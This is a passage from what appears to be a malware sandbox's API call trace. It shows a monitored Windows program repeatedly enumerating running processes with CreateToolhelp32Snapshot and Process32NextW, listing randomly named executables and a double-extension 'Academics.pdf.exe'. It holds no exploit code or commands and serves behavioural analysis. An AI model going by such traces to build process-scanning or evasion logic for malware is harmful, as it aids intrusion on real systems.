hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.812] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0292.813] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.814] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.815] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0292.815] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0292.816] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0292.817] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0292.818] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.819] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0292.820] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0292.821] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0292.822] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0292.823] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0292.823] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0292.824] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0292.825] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0292.826] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0292.827] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0292.828] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0292.828] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0292.830] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0292.831] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0292.831] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0292.832] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0292.833] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0292.834] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0292.835] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0292.836] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0292.837] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.837] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0292.838] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.839] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0292.840] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0292.841] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0292.842] CloseHandle (hObject=0x294) returned 1 [0292.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0292.842] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0292.842] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0292.842] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0292.844] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0292.845] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0292.846] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0292.847] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0292.848] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0292.849] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0292.850] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0292.851] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0292.851] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0292.852] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0292.853] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.854] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.855] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.856] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.857] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.857] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0292.858] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.859] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.860] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0292.861] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0292.862] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0292.863] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0292.863] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.864] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0292.865] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0292.866] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0292.867] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0292.868] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0292.869] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0292.869] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0292.870] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0292.871] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0292.872] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0292.873] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0292.873] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0292.874] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0292.875] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0292.876] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0292.877] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0292.878] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0292.878] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0292.879] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0292.880] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0292.881] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.882] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0292.882] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.883] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0292.884] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: 